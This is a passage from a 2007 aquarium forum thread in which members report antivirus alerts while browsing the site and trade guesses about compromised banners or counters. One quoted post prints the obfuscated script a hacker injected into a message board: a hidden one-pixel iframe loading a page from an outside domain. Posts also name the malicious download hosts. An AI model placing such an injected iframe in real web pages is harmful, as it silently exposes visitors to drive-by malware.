Go Back   Aquarium Advice - Aquarium Forum Community > Community Forum > Forum Admin & Announcements
Click Here to Login

Join Aquarium Advice Today
Reply
 
Thread Tools Search this Thread Display Modes
Please support our sponsors and let them know you heard about them on AquariumAdvice.com
 
Old 06-20-2007, 03:58 PM   #41
Aquarium Advice Addict
 
Join Date: Feb 2005
Location: Fargo, ND
Posts: 1,255
Send a message via AIM to Rach101
I have had my laptop lock up from such, and I run FireFox
__________________

__________________
We are far to young and clever
-too* in retrospect the irony hurts
Rach101 is offline   Reply With Quote
Old 06-21-2007, 10:41 AM   #42
Aquarium Advice Freak
 
Join Date: Feb 2007
Location: Edinburgh, Scotland
Posts: 201
Quote:
Originally Posted by ddcarnage
Ok I'm not sure if this is going to help you guys but I've solved my problem. I had been hacked because of a vulnerability in a third party php script I was using some time ago.

I seems that when my system was comprimised, the hackers modified a very important php file in my message board system to print the following :

Code:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");
Removing that solved the virus problem.

Cheers and good luck.
If this works I think there should be an aquarium advice poety competition in honour of our helpful friend.

"An ode to my Dwarf Cichlid" 8)

John
__________________

__________________
HiJaC is offline   Reply With Quote
Old 06-21-2007, 12:07 PM   #43
Aquarium Advice Addict
 
Join Date: Aug 2006
Location: not here anymore
Posts: 5,338
Quote:
Originally Posted by ddcarnage
Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank
Just stumbled on this thread...

I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?

My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.
__________________
Kurt_Nelson is offline   Reply With Quote
Old 06-22-2007, 05:41 AM   #44
Aquarium Advice Newbie
 
Join Date: Jun 2007
Posts: 7
Just wanted to report the same problem....

PC1 - Windows XP , IE7, AVG 7.5
PC2 - Vista Business, IE7, Sophos AV

Both pc's report 3 viruses and cause my pc to slow right down for approx 3 minutes while they are removed.
__________________
qwaz01 is offline   Reply With Quote
Old 06-22-2007, 04:06 PM   #45
Aquarium Advice Addict
 
Join Date: Aug 2006
Location: not here anymore
Posts: 5,338
Quote:
Originally Posted by Kurt_Nelson
Quote:
Originally Posted by ddcarnage
Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank
Just stumbled on this thread...

I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?

My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.
Actually... what I meant to say, but failed to type it (!), was that I had this problem right around the same time "Frank" did. But it was only for a day. I'm not picking up any issues at this time. Because it's an on again, off again thing, that's why I'm thinking it's tied into one of the rotating banners, or a counter - something that isn't hard coded on your server. Someone is hacking into code that's being linked into AA... not AA itself.
__________________
Kurt_Nelson is offline   Reply With Quote
Old 06-22-2007, 04:13 PM   #46
Aquarium Advice Addict
 
Fishyfanatic's Avatar
 
Join Date: Dec 2004
Location: Illinois
Posts: 11,964
I took note yesterday that when it popped up the Aquarium Guys banner was at the top. When I refreshed again to the Aquarium Guys banner it didn't cause the alert.
__________________
Vote for Aquarium Advice

29 Gallon Lake Malawi Fry
55 Gallon Community
150 Gallon Lake Malawi Cichlid
Fishyfanatic is offline   Reply With Quote
Old 06-23-2007, 02:24 AM   #47
Aquarium Advice Addict
 
Join Date: Aug 2006
Location: not here anymore
Posts: 5,338
I take back my previous comment. NAV firewall blocked it again tonight:

Details: Attempted Intrusion "HTTP WebViewFolderIcon SetSlice BO" against your machine was detected and blocked.
Intruder: s99.msiesettings.com(http(80)).

You might check out this thread...

http://forum.powweb.com/showthread.php?p=426599

Sounds like they got rid of it. (And AA got a plug too!)
__________________
Kurt_Nelson is offline   Reply With Quote
Old 06-25-2007, 07:26 PM   #48
Aquarium Advice Addict
 
SparKy697's Avatar
 
Join Date: Nov 2006
Location: Northwest Indiana
Posts: 1,495
This seems to be getting worse for me. I can not visit a single page on the aa site without getting a virus detect message. Here is the info on the virus that is being blocked on my machine:

http://us.mcafee.com/virusInfo/defau...virus_k=139961

I use IE and have only experienced this on the aa site....
__________________
-Joe
"...but the guy at the LFS said I needed it!"
SparKy697 is offline   Reply With Quote
Old 06-25-2007, 07:27 PM   #49
Aquarium Advice Freak
 
Join Date: Apr 2005
Location: Memphis,Tn US
Posts: 447
I've been getting various quarantines here using IE 7 and webroot Spysweeper. Today it quarantined the same virus nomerous times on different forum pages.

JS/CryptDown-A
__________________
Hoovercat is offline   Reply With Quote
Old 06-25-2007, 07:28 PM   #50
SW 20 & Over Club
 
ccCapt's Avatar


 
Join Date: Mar 2004
Location: Northeast PA
Posts: 5,362
Send a message via ICQ to ccCapt
I get this now on EVERY page on AA.
Kaspersky Internet Security 6
detected: Trojan program Trojan-Downloader.VBS.Small.do
URL: http://www.gpt-pal.com/scripts/templ...Crypt.DCScript
__________________

__________________
/Larry
125g reef
See My Tank Info
Check out The build project
ccCapt is offline   Reply With Quote
Reply

Please support our sponsors and let them know you heard about them on AquariumAdvice.com

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Main Page Format Change? Purrbox Forum Admin & Announcements 3 03-10-2007 10:44 PM
!!!!Update to the Main Page!!! fishfreek Forum Admin & Announcements 0 11-08-2002 10:41 PM







» Photo Contest Winners








Copyright 2002- Social Knowledge, LLC All Rights Reserved.

All times are GMT -4. The time now is 01:58 PM.


Powered by vBulletin® Version 3.8.8 Beta 1
Copyright ©2000 - 2017, vBulletin Solutions, Inc.